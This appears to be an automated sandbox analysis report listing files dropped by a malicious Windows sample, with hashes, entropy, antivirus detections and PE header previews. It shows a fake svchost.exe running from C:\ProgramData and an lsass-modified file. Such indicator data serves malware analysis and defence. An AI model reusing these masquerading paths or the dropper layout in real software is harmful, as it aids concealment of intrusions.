                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):12576970
                                                                                        Entropy (8bit):7.995050972613473
                                                                                        Encrypted:true
                                                                                        SSDEEP:196608:HWweM4sJFPpGAjMGhuPD5U4iDfyGgVwBdnpkYRMoSENsS3Mcj0kilsl:0SP8AxYDMDfDgVc6J4pMcj9Wsl
                                                                                        MD5:48B277A9AC4E729F9262DD9F7055C422
                                                                                        SHA1:D7E8A3FA664E863243C967520897E692E67C5725
                                                                                        SHA-256:5C832EDA59809A4F51DC779BB00BD964AAD42F2597A1C9F935CFB37F0888EF17
                                                                                        SHA-512:66DD4D1A82103CD90C113DF21EB693A2BFFDE2CDE41F9F40B5B85368D5A920B66C3BC5CADAF9F9D74DFD0F499086BEDD477F593184A7F755B7B210EF5E428941
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 74%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................-................,..............................................Rich...................PE..d...5L;f.........."....&.....r......0..........@....................................dy....`.....................................................x....p..e....0...#..............X...@...................................@............... ............................text............................... ..`.rdata...........0..................@..@.data....3..........................@....pdata...#...0...$..................@..@_RDATA.......`......................@..@.rsrc...e....p......................@..@.reloc..X...........................@..B................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\main.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1678
                                                                                        Entropy (8bit):5.369913341429046
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:MxHKQwYHKGSI6ogLHitHTHhAHKKkyHpHNp51qHGIs0HKD:iqbYqGSI6ogLCtzHeqKkyJtp5wmj0qD
                                                                                        MD5:47EF549ED9A6077539E2B7E16049BF8F
                                                                                        SHA1:2129E12D767465A7F083AB906EB481DB88B47D0E
                                                                                        SHA-256:ABACC0BCEB0B100C7FDC2DDDF3CDDCCB8C048466FD886D0A015AB49D5B0A38A7
                                                                                        SHA-512:EB77CA4097CD1F268E6462D7FA3F864700B7113A637C755FCFF843A01DE6088A7B3588D2CFD1C6C9F018E93783019E338793E7EC5FC29BDBCE6E6604AEB91A99
                                                                                        Malicious:false
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKey
                                                                                        Process:C:\Windows\System32\lsass.exe
                                                                                        File Type:very short file (no magic)
                                                                                        Category:modified
                                                                                        Size (bytes):1
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3::
                                                                                        MD5:93B885ADFE0DA089CDF634904FD59F71
                                                                                        SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                                                        SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                                                        SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                                                        Malicious:false
                                                                                        Preview:.
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):1.1940658735648508
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlllulbnolz:NllUc
                                                                                        MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                        SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                        SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                        SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                        Malicious:false
                                                                                        Preview:@...e................................................@..........
                                                                                        Process:C:\ProgramData\main.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1829040
                                                                                        Entropy (8bit):6.564424655402829
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:c9EeNSPwEW3cFSI4Tfm3hvbHsjAJcAMkP3:c9Nzm31PMo3
                                                                                        MD5:65CCD6ECB99899083D43F7C24EB8F869
                                                                                        SHA1:27037A9470CC5ED177C0B6688495F3A51996A023
                                                                                        SHA-256:ABA67C7E6C01856838B8BC6B0BA95E864E1FDCB3750AA7CDC1BC73511CEA6FE4
                                                                                        SHA-512:533900861FE36CF78B614D6A7CE741FF1172B41CBD5644B4A9542E6CA42702E6FBFB12F0FBAAE8F5992320870A15E90B4F7BF180705FC9839DB433413860BE6D
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nN\.. ... ... .Q..... .Q...e. .Q..... ..Q#... ..Q%... ..Q$... .8..... ..].... ...!.~. .rQ(... .rQ ... .wQ.... .rQ"... .Rich.. .........................PE..d.....d.........." ................................................................6U....`.................................................P...x................!.......T...........@..p............................A...............................................text...0........................... ..`.rdata...1.......2..................@..@.data....`... ...J..................@....pdata...!......."...P..............@..@.gfids...............r..............@..@.rsrc................t..............@..@.reloc...............~..............@..B................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):98224
                                                                                        Entropy (8bit):6.452201564717313
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
                                                                                        MD5:F34EB034AA4A9735218686590CBA2E8B
                                                                                        SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
                                                                                        SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
                                                                                        SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):820736
                                                                                        Entropy (8bit):6.056282443190043
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:tY0Uu7wLsglBv4i5DGAqXMAHhlyL82XTw05nmZfRFo:tp0NA1tAmZfR
                                                                                        MD5:EE3D454883556A68920CAAEDEFBC1F83
                                                                                        SHA1:45B4D62A6E7DB022E52C6159EEF17E9D58BEC858
                                                                                        SHA-256:791E7195D7DF47A21466868F3D7386CFF13F16C51FCD0350BF4028E96278DFF1
                                                                                        SHA-512:E404ADF831076D27680CC38D3879AF660A96AFC8B8E22FFD01647248C601F3C6C4585D7D7DC6BBD187660595F6A48F504792106869D329AA1A0F3707D7F777C6
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.r.q...q...q...x...y......s...:...s......|......y......r.....r...q...L.....Q.....p.....p.....p...Richq...........PE..d... ..d.........." ...#.@...H.......F....................................................`.........................................@c..`....c.......................................9..............................P8..@............P...............................text....?.......@.................. ..`.rdata.......P.......D..............@..@.data........p.......`..............@....pdata...............h..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):83736
                                                                                        Entropy (8bit):6.595094797707322
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:hXOz78ZqjUyAsIi7W/5+D8W35mjZm35ILCVM7SyfYPxe:pOzwpyAFi7WMgW34jZm35ILCVMZoxe
                                                                                        MD5:86D1B2A9070CD7D52124126A357FF067
                                                                                        SHA1:18E30446FE51CED706F62C3544A8C8FDC08DE503
                                                                                        SHA-256:62173A8FADD4BF4DD71AB89EA718754AA31620244372F0C5BBBAE102E641A60E
                                                                                        SHA-512:7DB4B7E0C518A02AE901F4B24E3860122ACC67E38E73F98F993FE99EB20BB3AA539DB1ED40E63D6021861B54F34A5F5A364907FFD7DA182ADEA68BBDD5C2B535
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .........\..............................................P............`......................................... ...H...h........0....... ..,......../...@......`...T...............................8............................................text.............................. ..`.rdata...=.......>..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):181248
                                                                                        Entropy (8bit):6.188683787528254
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:rZ1fKD8GVLHASq0TTjfQxnkVB0hcspEsHS7iiSTLkKetJb9Pu:rZNRGVb9TTCnaZsuMXiSTLLeD9
                                                                                        MD5:EBB660902937073EC9695CE08900B13D
                                                                                        SHA1:881537ACEAD160E63FE6BA8F2316A2FBBB5CB311
                                                                                        SHA-256:52E5A0C3CA9B0D4FC67243BD8492F5C305FF1653E8D956A2A3D9D36AF0A3E4FD
                                                                                        SHA-512:19D5000EF6E473D2F533603AFE8D50891F81422C59AE03BEAD580412EC756723DC3379310E20CD0C39E9683CE7C5204791012E1B6B73996EA5CB59E8D371DE24
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ih..-..C-..C-..C$qMC!..C.|.B/..CKf#C)..C.|.B&..C.|.B%..C.|.B)..Cfq.B)..C.|.B...C-..C...C.|.B)..C$qKC,..C.|.B,..C.|!C,..C.|.B,..CRich-..C........PE..d.....e.........." .........@...............................................0............`..........................................g..l...|g..................H............ .......M...............................M..8............................................text...h........................... ..`.rdata..l...........................@..@.data....\.......0...v..............@....pdata..H...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):123672
                                                                                        Entropy (8bit):6.047035801914277
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:0OEESRiaiH6lU1vxqfrId0sx3gVILLPykxA:hj+I1vAfrIRx3gN
                                                                                        MD5:1635A0C5A72DF5AE64072CBB0065AEBE
                                                                                        SHA1:C975865208B3369E71E3464BBCC87B65718B2B1F
                                                                                        SHA-256:1EA3DD3DF393FA9B27BF6595BE4AC859064CD8EF9908A12378A6021BBA1CB177
                                                                                        SHA-512:6E34346EA8A0AACC29CCD480035DA66E280830A7F3D220FD2F12D4CFA3E1C03955D58C0B95C2674AEA698A36A1B674325D3588483505874C2CE018135320FF99
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............d...d...d.......d...e...d...a...d...`...d...g...d.d.e...d...`...d...e...d.:.e...d...e.I.d.d.i...d.d.d...d.d...d.d.f...d.Rich..d.........................PE..d.....,d.........." ................@Z..............................................!.....`..........................................P.......P..................D......../..............T...........................0...8...............H............................text............................... ..`.rdata...k.......l..................@..@.data...T>...p...8...\..............@....pdata..D...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):254744
                                                                                        Entropy (8bit):6.564308911485739
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:3LT2sto29vTlN5cdIKdo4/3VaV8FlBa9qWMa3pLW1A/T8O51j4iab9M:H2s/9vTlPcdk4vVtFU98iIu
                                                                                        MD5:20C77203DDF9FF2FF96D6D11DEA2EDCF
                                                                                        SHA1:0D660B8D1161E72C993C6E2AB0292A409F6379A5
                                                                                        SHA-256:9AAC010A424C757C434C460C3C0A6515D7720966AB64BAD667539282A17B4133
                                                                                        SHA-512:2B24346ECE2CBD1E9472A0E70768A8B4A5D2C12B3D83934F22EBDC9392D9023DCB44D2322ADA9EDBE2EB0E2C01B5742D2A83FA57CA23054080909EC6EB7CF3CA
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........76..VX..VX..VX.....VX..#Y..VX..#]..VX..#\..VX..#[..VX.t#Y..VX...Y..VX..VY.+VX.t#[..VX.t#U..VX.t#X..VX.t#...VX.t#Z..VX.Rich.VX.........................PE..d.....,d.........." .....|...:.......................................................r....`..........................................T..P...0U...................'......./......<...0...T...............................8............................................text....{.......|.................. ..`.rdata..............................@..@.data....)...p...$...X..............@....pdata...'.......(...|..............@..@.rsrc...............................@..@.reloc..<...........................@..B........................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):64792
                                                                                        Entropy (8bit):6.223467179037751
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:/smKJPganCspF1dqZAC2QjP2RILOIld7SyEPxDF:/smKpgNoF1dqZDnjP2RILOIv2xB
                                                                                        MD5:D4674750C732F0DB4C4DD6A83A9124FE
                                                                                        SHA1:FD8D76817ABC847BB8359A7C268ACADA9D26BFD5
                                                                                        SHA-256:CAA4D2F8795E9A55E128409CC016E2CC5C694CB026D7058FC561E4DD131ED1C9
                                                                                        SHA-512:97D57CFB80DD9DD822F2F30F836E13A52F771EE8485BC0FD29236882970F6BFBDFAAC3F2E333BBA5C25C20255E8C0F5AD82D8BC8A6B6E2F7A07EA94A9149C81E
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P...........<....................................................`............................................P...0............................/......T....k..T............................k..8............`.. ............................text....N.......P.................. ..`.rdata..4P...`...R...T..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):158488
                                                                                        Entropy (8bit):6.8491143497239655
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:j0k3SXjD9aWpAn3rb7SbuDlvNgS4fWqEznfo9mNoFTSlXZ8Ax5ILZ1GIxq:j0kiXjD9v8X7Euk4wYOFTafxn
                                                                                        MD5:7447EFD8D71E8A1929BE0FAC722B42DC
                                                                                        SHA1:6080C1B84C2DCBF03DCC2D95306615FF5FCE49A6
                                                                                        SHA-256:60793C8592193CFBD00FD3E5263BE4315D650BA4F9E4FDA9C45A10642FD998BE
                                                                                        SHA-512:C6295D45ED6C4F7534C1A38D47DDC55FEA8B9F62BBDC0743E4D22E8AD0484984F8AB077B73E683D0A92D11BF6588A1AE395456CFA57DA94BB2A6C4A1B07984DE
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.M...M...M...D..I.......O.......F.......E.......N.......N.......O...M...(.......w.......L.......L.......L...RichM...................PE..d...&.,d.........." .....`..........p3...............................................4....`.............................................L.......x....`.......@.......<.../...p..D...H{..T............................{..8............p...............................text....^.......`.................. ..`.rdata.......p.......d..............@..@.data........0......................@....pdata.......@......................@..@.rsrc........`.......0..............@..@.reloc..D....p.......:..............@..B........................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1165824
                                                                                        Entropy (8bit):7.0564514753444785
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:LsZDXB6wmcZzdcZ7fUoPHUEXLznTTenIGHSQt:QZDXB6wmcUfTKHHt
                                                                                        MD5:0359DFA90FFB2E190C91A4DE76E36BF7
                                                                                        SHA1:E4FFFAC0206C2E41B44898AAA49583212F406DEE
                                                                                        SHA-256:22C1CA2F788196DF27FDBE4A9B36CB7CBAE51CD38CF1C1ABF44BAD66CC82C236
                                                                                        SHA-512:AEC3EAE25FC4CEE3A1B6A9304369CEE8DA5CCC771971456B1FF0F750BB17C9BA038B26CAAF2421ACBB40AE9C4D79275C0D04045098D188926C84E25C532ABBD0
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....b..........0..........p.....................................[........ .........................................+........................'...........................................`..(...................d................................text...ha.......b..................`.P`.data................f..............@.`..rdata..p............h..............@.`@.pdata...'.......(...V..............@.0@.xdata..L,...........~..............@.0@.bss....h.............................`..edata..+...........................@.0@.idata..............................@.0..CRT....X...........................@.@..tls................................@.@..reloc..............................@.0B........................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):31512
                                                                                        Entropy (8bit):6.563116725717513
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:bxrUGCpa6rIxdK/rAwVILQU85YiSyvz5PxWEaAc:trUZIzYrAwVILQUG7SydPxDc
                                                                                        MD5:D8C1B81BBC125B6AD1F48A172181336E
                                                                                        SHA1:3FF1D8DCEC04CE16E97E12263B9233FBF982340C
                                                                                        SHA-256:925F05255F4AAE0997DC4EC94D900FD15950FD840685D5B8AA755427C7422B14
                                                                                        SHA-512:CCC9F0D3ACA66729832F26BE12F8E7021834BBEE1F4A45DA9451B1AA5C2E63126C0031D223AF57CF71FAD2C85860782A56D78D8339B35720194DF139076E0772
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a............................................V...................V......V......V......V......Rich....................PE..d.....,d.........." .........6......................................................N.....`.........................................@C..L....C..d....p.......`.......L.../...........3..T...........................p3..8............0.. ............................text...~........................... ..`.rdata.......0......................@..@.data........P.......8..............@....pdata.......`.......<..............@..@.rsrc........p.......@..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):79128
                                                                                        Entropy (8bit):6.284790077237953
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:ZmtvsXhgzrojAs9/s+S+pGLypbyxk/DDTBVILLwX7SyiPx9:c56OzyAs9/sT+pGLypb+k/XFVILLwX4f
                                                                                        MD5:819166054FEC07EFCD1062F13C2147EE
                                                                                        SHA1:93868EBCD6E013FDA9CD96D8065A1D70A66A2A26
                                                                                        SHA-256:E6DEB751039CD5424A139708475CE83F9C042D43E650765A716CB4A924B07E4F
                                                                                        SHA-512:DA3A440C94CB99B8AF7D2BC8F8F0631AE9C112BD04BADF200EDBF7EA0C48D012843B4A9FB9F1E6D3A9674FD3D4EB6F0FA78FD1121FAD1F01F3B981028538B666
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~...:...:...:...3.i.<...h...8...h...6...h...2...h...9.......8...:.......q...=.......;.......;.......;.......;...Rich:...........PE..d.....,d.........." .....l...........%.......................................P............`.............................................P............0....... ..<......../...@..........T..............................8............................................text...fj.......l.................. ..`.rdata..Ts.......t...p..............@..@.data...............................@....pdata..<.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):160536
                                                                                        Entropy (8bit):6.027748879187965
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:OwYiZ+PtocHnVXhLlasuvMETxoEBA+nbUtGnBSonJCNI5ILC7Gax1:FYk+PtocHVxx/uvPCEwhGJ
                                                                                        MD5:7910FB2AF40E81BEE211182CFFEC0A06
                                                                                        SHA1:251482ED44840B3C75426DD8E3280059D2CA06C6
                                                                                        SHA-256:D2A7999E234E33828888AD455BAA6AB101D90323579ABC1095B8C42F0F723B6F
                                                                                        SHA-512:BFE6506FEB27A592FE9CF1DB7D567D0D07F148EF1A2C969F1E4F7F29740C6BB8CCF946131E65FE5AA8EDE371686C272B0860BD4C0C223195AAA1A44F59301B27
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C.-...-...-.....-...,...-...(...-...)...-.......-.W.,...-.R.,...-...,...-...,...-.W. ...-.W.-...-.W....-.W./...-.Rich..-.................PE..d.....,d.........." ................l*..............................................%.....`.............................................d...........`.......P.......D.../...p..8.......T...............................8............................................text...(........................... ..`.rdata..6...........................@..@.data....j.......f..................@....pdata.......P....... ..............@..@.rsrc........`.......,..............@..@.reloc..8....p.......6..............@..B................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22128
                                                                                        Entropy (8bit):4.746916379473427
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:HFOhEWhhW9DWGxVA6VWQ4iW7rd9ZnAOVX01k9z3AAcodV:HFdWhhWhxdm31AqR9z7BV
                                                                                        MD5:40BA4A99BF4911A3BCA41F5E3412291F
                                                                                        SHA1:C9A0E81EB698A419169D462BCD04D96EAA21D278
                                                                                        SHA-256:AF0E561BB3B2A13AA5CA9DFC9BC53C852BAD85075261AF6EF6825E19E71483A6
                                                                                        SHA-512:F11B98FF588C2E8A88FDD61D267AA46DC5240D8E6E2BFEEA174231EDA3AFFC90B991FF9AAE80F7CEA412AFC54092DE5857159569496D47026F8833757C455C23
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....dZ..........." .........0...............................................@............`A........................................p...,............0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22120
                                                                                        Entropy (8bit):4.597173095457187
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:LWhhW8R9WvkJ0f5AbVWQ4mWC7ZNKd2kQX01k9z3Ad4+BhNKD:LWhhWgaab/NNPR9zw4fD
                                                                                        MD5:C5E3E5DF803C9A6D906F3859355298E1
                                                                                        SHA1:0ECD85619EE5CE0A47FF840652A7C7EF33E73CF4
                                                                                        SHA-256:956773A969A6213F4685C21702B9ED5BD984E063CF8188ACBB6D55B1D6CCBD4E
                                                                                        SHA-512:DEEDEF8EAAC9089F0004B6814862371B276FBCC8DF45BA7F87324B2354710050D22382C601EF8B4E2C5A26C8318203E589AA4CAF05EB2E80E9E8C87FD863DFC9
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....N7.........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22128
                                                                                        Entropy (8bit):4.609345057720842
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:9WhhW1WGxVA6VWQ4cRWAAuENQlO8X01k9z3AenFbvrJ:9WhhWhxdleuEKlO8R9zhFHJ
                                                                                        MD5:71F1D24C7659171EAFEF4774E5623113
                                                                                        SHA1:8712556B19ED9F80B9D4B6687DECFEB671AD3BFE
                                                                                        SHA-256:C45034620A5BB4A16E7DD0AFF235CC695A5516A4194F4FEC608B89EABD63EEEF
                                                                                        SHA-512:0A14C03365ADB96A0AD539F8E8D8333C042668046CEA63C0D11C75BE0A228646EA5B3FBD6719C29580B8BAAEB7A28DC027AF3DE10082C07E089CDDA43D5C467A
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....IL..........." .........0...............................................@............`A........................................p................0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\svchost.exe
                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22112
                                                                                        Entropy (8bit):4.640577240680024
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:IzmxD3T4qbWhhWNc5WvkJ0f5AbVWQ4OWXIH52mvp13s5yX01k9z3A3MNL3:IzQNWhhWNchaabdHMmfcYR9zEMNr
                                                                                        MD5:F1534C43C775D2CCEB86F03DF4A5657D
                                                                                        SHA1:9ED81E2AD243965E1090523B0C915E1D1D34B9E1
                                                                                        SHA-256:6E6BFDC656F0CF22FABBA1A25A42B46120B1833D846F2008952FE39FE4E57AB2
                                                                                        SHA-512:62919D33C7225B7B7F97FAF4A59791F417037704EB970CB1CB8C50610E6B2E86052480CDBA771E4FAD9D06454C955F83DDB4AEA2A057725385460617B48F86A7
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
